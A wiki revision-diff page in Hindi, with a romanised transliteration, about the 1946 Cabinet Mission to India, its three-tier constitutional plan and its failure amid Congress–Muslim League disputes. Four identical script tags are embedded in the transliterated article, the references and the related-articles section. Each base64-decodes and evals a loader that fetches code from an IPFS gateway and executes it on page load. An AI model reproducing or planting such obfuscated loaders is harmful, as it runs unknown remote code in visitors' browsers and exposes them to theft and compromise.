Difference between revisions of "कैबिनेट मिशन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "राजनैतिक" to "राजनीतिक")
m (Text replace - "महत्वपूर्ण" to "महत्त्वपूर्ण")
Line 11: Line 11:
 
मुस्लिम लीग ने ऊपर से तो इस योजना को स्वीकार कर लिया, लेकिन यह स्वीकृति वास्तविक न होकर दिखावा मात्र थी। [[5 जून]], 1946 को, [[मुहम्मद अली जिन्ना]] ने मुस्लिम लीग कौंसिल में भाषण देते हुए कहा- "मैं आपको बता देना चाहता हूँ कि, जब तक हम अपने सारे क्षेत्र को मिला कर पूर्ण और प्रभुसत्ता सम्पन्न पाकिस्तान की स्थापना नहीं कर लेंगे, तब तक हम संतुष्ट होकर नहीं बैठेंगे।" लीग की इस विसंगति के कारण ही गांधीजी और कांग्रेस में उनके साथी, "प्रांतों के वर्गबंधन" की योजना के विषय में अशांत और आशंकित हो गए। लीग इस योजना को अनिवार्य करके इसे पाकिस्तान की स्थापना का साधन बनाना चाहती थी। इस बात पर मतभेद से कैबिनेट मिशन-योजना विफल हो गई।<ref name="mcc"/>
 
मुस्लिम लीग ने ऊपर से तो इस योजना को स्वीकार कर लिया, लेकिन यह स्वीकृति वास्तविक न होकर दिखावा मात्र थी। [[5 जून]], 1946 को, [[मुहम्मद अली जिन्ना]] ने मुस्लिम लीग कौंसिल में भाषण देते हुए कहा- "मैं आपको बता देना चाहता हूँ कि, जब तक हम अपने सारे क्षेत्र को मिला कर पूर्ण और प्रभुसत्ता सम्पन्न पाकिस्तान की स्थापना नहीं कर लेंगे, तब तक हम संतुष्ट होकर नहीं बैठेंगे।" लीग की इस विसंगति के कारण ही गांधीजी और कांग्रेस में उनके साथी, "प्रांतों के वर्गबंधन" की योजना के विषय में अशांत और आशंकित हो गए। लीग इस योजना को अनिवार्य करके इसे पाकिस्तान की स्थापना का साधन बनाना चाहती थी। इस बात पर मतभेद से कैबिनेट मिशन-योजना विफल हो गई।<ref name="mcc"/>
 
==विवाद की चरम सीमा==
 
==विवाद की चरम सीमा==
तीन स्तरीय संविधान योजना बड़ी सूक्ष्म व्यवस्था थी, जिसमें रोकथाम और संतुलन बनाए रखने के लिए बहुत सारे उपाय किए गए थे। बड़े-बड़े दलों के बीच पूर्ण सहयोग के बिना संविधान बनाना असंभव था, उसे कार्यरूप देना तो दूर की बात थी। ऐसे सहयोग का अभाव था। कैबिनेट मिशन-योजना में समझौते का प्रयास था, लेकिन यह [[कांग्रेस]] और [[मुस्लिम लीग]] को एकमत नहीं कर सकी। इसका परिणाम यह हुआ कि जिन मामलों को यह समझा जाता था कि, इस योजना से वे तय हो चुके हैं, वे ही मिशन के तीनों सदस्यों के इंग्लैंड लौटने पर तुरंत फिर उठाए गए। किन प्रांतों के 'वर्ग' बनाये जाएँ और अंतरिम सरकार में किस दल के कितने लोग होंगे, इन दो महत्वपूर्ण प्रश्नों पर वाद-विवाद की उत्तेजना चरम सीमा पर पहुँच गई।
+
तीन स्तरीय संविधान योजना बड़ी सूक्ष्म व्यवस्था थी, जिसमें रोकथाम और संतुलन बनाए रखने के लिए बहुत सारे उपाय किए गए थे। बड़े-बड़े दलों के बीच पूर्ण सहयोग के बिना संविधान बनाना असंभव था, उसे कार्यरूप देना तो दूर की बात थी। ऐसे सहयोग का अभाव था। कैबिनेट मिशन-योजना में समझौते का प्रयास था, लेकिन यह [[कांग्रेस]] और [[मुस्लिम लीग]] को एकमत नहीं कर सकी। इसका परिणाम यह हुआ कि जिन मामलों को यह समझा जाता था कि, इस योजना से वे तय हो चुके हैं, वे ही मिशन के तीनों सदस्यों के इंग्लैंड लौटने पर तुरंत फिर उठाए गए। किन प्रांतों के 'वर्ग' बनाये जाएँ और अंतरिम सरकार में किस दल के कितने लोग होंगे, इन दो महत्त्वपूर्ण प्रश्नों पर वाद-विवाद की उत्तेजना चरम सीमा पर पहुँच गई।
  
 
{{प्रचार}}
 
{{प्रचार}}

Revision as of 11:24, 27 August 2011

kaibinet mishan etali mantrimandal dvara 1946 ee. mean bharat bheja gaya tha. isaka uddeshy bharatiy netaoan se milakar unhean is bat ka vishvas dilana tha ki, sarakar sanvaidhanik mamalean par shighr hi samajhauta karane ko utsuk hai. lekin british sarakar aur bharatiy rajanitik netaoan ke bich nirnayak charan march, 1946 mean aya, jab mantrimandal ke tin sadasy lard paithik lareans, sar staifard krips aur shri e.vi. alekzendar bharat ae.[1]

kaangres dvara vibhajan ka virodh

etali dvara bheje ge is mantrimandal se kaangres ki or se batachit abul kalam azad ne ki. is kam mean javahar lal neharoo aur vallabh bhaee patel ne unaki sahayata ki. mahatma gaandhi se ye log salah lete rahate the. lekin is mool prashn par batachit mean gatirodh paida ho gaya ki bharat ki ekata bani rahegi athava muslim lig ki pakistan ki maang ko poora karane ke lie desh ka vibhajan hoga. kaangres vibhajan ka virodh kar rahi thi aur vibhi़nn praantoan ko jitani bhi adhik-se-adhik arthik, saanskritik aur kshetriy svayattata de sakana sanbhav tha, dene ko taiyar thi. shimala mean ayojit ek sammelan mean kaangres aur lig ke matabhed door nahian ho sake.[1]

mishan ki samajhauta yojana

kaangres aur muslim lig ke matabhed door n hone se kaibinet mishan ne 16 mee, 1946 ko apani samajhauta yojana ek vaktavy mean pesh ki. unhoanne bharat ke lie tin stariy sanvaidhanik dhaanche ki rooparekha prastut ki, jo is prakar thi-

  • sanvidhan sangh ke dhang ka hoga, jisamean riyasatean bhi sammilit hoangian.
  • sangh sarakar par keval videshi mamale, suraksha aur yatayat sanbhalane ka bhar hoga.
  • niche ke star par praant aur riyasatean hoangi aur sare vishisht adhikar inhian ko mileange.
  • bich ke star par praantoan dvara svechchha se banaye aise samooh hoange, jo saman vishayoan par vichar kareange.

mishan ki asaphalata

muslim lig ne oopar se to is yojana ko svikar kar liya, lekin yah svikriti vastavik n hokar dikhava matr thi. 5 joon, 1946 ko, muhammad ali jinna ne muslim lig kauansil mean bhashan dete hue kaha- "maian apako bata dena chahata hooan ki, jab tak ham apane sare kshetr ko mila kar poorn aur prabhusatta sampann pakistan ki sthapana nahian kar leange, tab tak ham santusht hokar nahian baitheange." lig ki is visangati ke karan hi gaandhiji aur kaangres mean unake sathi, "praantoan ke vargabandhan" ki yojana ke vishay mean ashaant aur ashankit ho ge. lig is yojana ko anivary karake ise pakistan ki sthapana ka sadhan banana chahati thi. is bat par matabhed se kaibinet mishan-yojana viphal ho gee.[1]

vivad ki charam sima

tin stariy sanvidhan yojana b di sookshm vyavastha thi, jisamean rokatham aur santulan banae rakhane ke lie bahut sare upay kie ge the. b de-b de daloan ke bich poorn sahayog ke bina sanvidhan banana asanbhav tha, use karyaroop dena to door ki bat thi. aise sahayog ka abhav tha. kaibinet mishan-yojana mean samajhaute ka prayas tha, lekin yah kaangres aur muslim lig ko ekamat nahian kar saki. isaka parinam yah hua ki jin mamaloan ko yah samajha jata tha ki, is yojana se ve tay ho chuke haian, ve hi mishan ke tinoan sadasyoan ke ianglaiand lautane par turant phir uthae ge. kin praantoan ke 'varg' banaye jaean aur aantarim sarakar mean kis dal ke kitane log hoange, in do mahattvapoorn prashnoan par vad-vivad ki uttejana charam sima par pahuanch gee.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. 1.0 1.1 1.2 kaibinet mishan (hindi) (ech.ti.em.el.). . abhigaman tithi: 17 joon, 2011.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>